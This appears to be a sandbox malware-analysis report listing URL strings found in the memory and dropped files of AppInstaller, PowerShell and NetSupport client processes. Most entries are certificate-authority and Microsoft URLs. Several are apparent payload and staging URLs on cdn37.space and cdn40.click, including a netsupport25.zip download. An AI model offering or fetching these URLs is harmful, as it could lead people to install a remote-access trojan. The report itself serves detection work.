Source: AppInstaller.exe, 0000000E.00000002.1776317770.00000196D6200000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ancert.com/cps0
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.anf.es
Source: AppInstaller.exe, 0000000E.00000003.1680481341.00000196D5F57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.anf.es/AC/RC/ocsp0c
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.anf.es/es/address-direccion.html
Source: powershell.exe, 00000017.00000002.2180463385.000001E11E621000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000019.00000002.1941634656.000002B2801BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html8
Source: AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ca.posta.rs/dokumentacija0h
Source: AppInstaller.exe, 0000000E.00000003.1680507889.00000196D5F68000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680617833.00000196D5F42000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5361000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.certeurope.fr/reference/pc-root2.pdf0
Source: AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5361000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.certeurope.fr/reference/root2.crl0
Source: AppInstaller.exe, 0000000E.00000003.1680481341.00000196D5F57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class1.crl0
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class3.crl0
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: AppInstaller.exe, 0000000E.00000002.1766321527.00000196D5140000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.chambersign.org1
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.comsign.co.il/cps0
Source: AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5361000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.correo.com.uy/correocert/cps.pdf0
Source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr, TCCTL32.DLL.26.dr	String found in binary or memory: http://www.crossteccorp.com
Source: AppInstaller.exe, 0000000E.00000003.1687850749.00000196D5FBD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1775764927.00000196D5FA9000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.datev.de/zertifikat-policy-bt0
Source: AppInstaller.exe, 0000000E.00000003.1687850749.00000196D5FBD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679946512.00000196D5F7C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.datev.de/zertifikat-policy-int0
Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1687850749.00000196D5FBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.datev.de/zertifikat-policy-std0
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.defence.gov.au/pki0
Source: AppInstaller.exe, 0000000E.00000003.1687850749.00000196D5FBD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1775764927.00000196D5FA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
Source: AppInstaller.exe, 0000000E.00000003.1687850749.00000196D5FBD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1775764927.00000196D5FA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.disig.sk/ca0f
Source: AppInstaller.exe, 0000000E.00000003.1679991500.00000196D5F77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.dnie.es/dpc0
Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: AppInstaller.exe, 0000000E.00000003.1687786555.00000196D5F9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ecee.gov.pt/dpc0
Source: AppInstaller.exe, 0000000E.00000003.1680481341.00000196D5F57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
Source: AppInstaller.exe, 0000000E.00000003.1680481341.00000196D5F57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.eme.lv/repository0
Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr	String found in binary or memory: http://www.globalsign.net/repository/0
Source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr	String found in binary or memory: http://www.globalsign.net/repository09
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.globaltrust.info0
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.globaltrust.info0=
Source: AppInstaller.exe, 0000000E.00000003.1687786555.00000196D5F9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
Source: client32.exe, 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.dr	String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
Source: client32.exe, 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.dr	String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162FB9000.00000004.00000800.00020000.00000000.sdmp, PCICL32.DLL.26.dr	String found in binary or memory: http://www.netsupportsoftware.com
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oaticerts.com/repository.
Source: client32.exe, 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.dr	String found in binary or memory: http://www.pci.co.uk/support
Source: client32.exe, 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.dr	String found in binary or memory: http://www.pci.co.uk/supportsupport
Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
Source: AppInstaller.exe, 0000000E.00000003.1680481341.00000196D5F57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_21_1.pdf0:
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.pki.gva.es/cps0
Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.pki.gva.es/cps0%
Source: AppInstaller.exe, 0000000E.00000003.1687850749.00000196D5FBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
Source: AppInstaller.exe, 0000000E.00000003.1680507889.00000196D5F68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.postsignum.cz/crl/psrootqca2.crl02
Source: AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.rcsc.lt/repository0
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sk.ee/cps/0
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sk.ee/juur/crl/0
Source: AppInstaller.exe, 0000000E.00000002.1776167790.00000196D5FE2000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ssc.lt/cps03
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.suscerte.gob.ve/dpc0
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.suscerte.gob.ve/lcr0#
Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, HTCTL32.DLL.26.dr, pcicapi.dll.26.dr, PCICHEK.DLL.26.dr, AudioCapture.dll.26.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, HTCTL32.DLL.26.dr, pcicapi.dll.26.dr, PCICHEK.DLL.26.dr, AudioCapture.dll.26.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
Source: AppInstaller.exe, 0000000E.00000003.1680507889.00000196D5F68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www2.postsignum.cz/crl/psrootqca2.crl01
Source: AppInstaller.exe, 00000024.00000002.2594809898.000002A99F399000.00000004.00000020.00020000.00000000.sdmp, AppInstallerFullTrustAppServiceClient.exe, 00000026.00000002.2102011848.00000177F3C7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: AppInstaller.exe, 0000000E.00000002.1766321527.00000196D5140000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp41
Source: AppInstallerFullTrustAppServiceClient.exe, 00000012.00000002.1677556637.000002B5AB27A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppP
Source: powershell.exe, 00000029.00000002.2535977313.000002678C620000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000017.00000002.2180463385.000001E11D001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1941634656.000002B280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023161161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2535977313.000002678C66C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000001A.00000002.1968531120.0000023161D6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.000002316227F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162258000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.000002316179B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1967121818.000002315F2F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 0000001A.00000002.1968531120.000002316227F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp(
Source: powershell.exe, 0000001A.00000002.1968531120.000002316179B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp8
Source: AppInstaller.exe, 0000000E.00000002.1767105272.00000196D5300000.00000004.00000020.00020000.00000000.sdmp, AppInstallerFullTrustAppServiceClient.exe, 00000012.00000002.1677556637.000002B5AB27A000.00000004.00000020.00020000.00000000.sdmp, AppInstallerFullTrustAppServiceClient.exe, 00000012.00000002.1677515600.000002B5AB261000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2594809898.000002A99F3F2000.00000004.00000020.00020000.00000000.sdmp, AppInstallerFullTrustAppServiceClient.exe, 00000026.00000002.2102011848.00000177F3C8C000.00000004.00000020.00020000.00000000.sdmp, AppInstallerFullTrustAppServiceClient.exe, 00000026.00000002.2100907317.00000177F3C62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: AppInstaller.exe, 0000000E.00000002.1767105272.00000196D5300000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS80
Source: AppInstallerFullTrustAppServiceClient.exe, 00000026.00000002.2102011848.00000177F3C8C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSClass
Source: AppInstallerFullTrustAppServiceClient.exe, 00000012.00000002.1677515600.000002B5AB261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSPM
Source: AppInstallerFullTrustAppServiceClient.exe, 00000026.00000002.2100907317.00000177F3C62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSapplication/msixbundleasimovrome.telemetryi
Source: AppInstaller.exe, 00000024.00000002.2594809898.000002A99F3F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSbl
Source: chromecache_146.1.dr	String found in binary or memory: https://api.ipify.org?format=json
Source: powershell.exe, 0000001A.00000002.1968531120.000002316179B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn37.space.0.0
Source: powershell.exe, 0000001A.00000002.1968531120.0000023161659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.000002316179B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn37.space/974afa0a-d334-48ec-a0d4-4cc14efa730c-1d3d044a-e654-41e3-ad32-38a2934393e4?aklshd
Source: powershell.exe, 0000001A.00000002.1968531120.000002316179B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023161650000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn37.space/files/netsupport25.zip
Source: powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn40.click
Source: powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn40.click/223dc805-5605-4a0b-b828-cdad1b84126e-79d39c2c-0f10-48d1-9edf-c18a784efba0
Source: powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn40.click/73689d8a-25b4-41cf-b693-05591ed804a7-7433f7b1-9997-477b-aadc-5a6e8d233c61
Source: powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn40.click/73689d8a-25b4-41cf-b693-05591ed804a7-7433f7b1-9997-477b-aadc-5a6e8d233c61?fmtKxA
Source: powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn40.click/974afa0a-d334-48ec-a0d4-4cc14efa730c-1d3d044a-e654-41e3-ad32-38a2934393e4
Source: chromecache_146.1.dr	String found in binary or memory: https://cdn40.click/9e4e27b7-bcfb-4298-bf8f-2cf4a6bdb3bf-9b6b40d6-3f8e-4755-9063-562658ebdb95
Source: powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn40.click/bb9c1a14-4e3d-40ab-bcc8-0b84e78255b0-4bed9ff2-0f4e-48fb-92ed-1065fcd85e01
Source: powershell.exe, 0000001A.00000002.2149775477.00000231711D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001A.00000002.2149775477.00000231711D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001A.00000002.2149775477.00000231711D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: AppInstaller.exe, 0000000E.00000003.1680481341.00000196D5F57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162FB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, PCICL32.DLL.26.dr, HTCTL32.DLL.26.dr, pcicapi.dll.26.dr, PCICHEK.DLL.26.dr, AudioCapture.dll.26.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162FB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, PCICL32.DLL.26.dr, HTCTL32.DLL.26.dr, pcicapi.dll.26.dr, PCICHEK.DLL.26.dr, AudioCapture.dll.26.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: powershell.exe, 00000019.00000002.1941634656.000002B2801BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester8
Source: powershell.exe, 00000017.00000002.2180463385.000001E11E1A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1941634656.000002B2814AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2535977313.000002678CC32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: AppInstaller.exe, 0000000E.00000003.1690225713.00000196D59C8000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1694980372.00000196D5C45000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1696809126.00000196D5C48000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1695283306.00000196D5A8C000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1695365533.00000196D5B19000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1682881043.00000196D5A8B000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1695210802.00000196D59CE000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1684574291.00000196D5997000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1772231898.00000196D5B22000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1683185279.00000196D5B18000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1694932844.00000196D5C47000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1688507189.00000196D5C3C000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000003.2153475118.000002A99FBC8000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000003.2174777930.000002A99FE3E000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2656943644.000002A99FD22000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000003.2172597262.000002A99FC8C000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000003.2171518364.000002A99FBCE000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000003.2130006171.000002A99FC7B000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000003.2137618649.000002A99FBCA000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000003.2134290511.000002A99FD21000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000003.2119229019.000002A99FBCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://microsoft.sharepoint.com/teams/appxmanifest/SitePages/Home.aspx
Source: powershell.exe, 00000017.00000002.2398750900.000001E12D1B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2180463385.000001E11EA2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2398750900.000001E12D07C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2037069987.000002B2901D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2037069987.000002B2900A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2149775477.00000231711D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 00000017.00000002.2180463385.000001E11E621000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: AppInstaller.exe, 00000024.00000003.2183907074.000002A99FD14000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000003.2141059449.000002A99FE3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://osgwiki.com/wiki/Manifest_Request
Source: AppInstaller.exe, 0000000E.00000003.1687850749.00000196D5FBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://repository.luxtrust.lu0
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.certicamara.com/marco-legal0Z
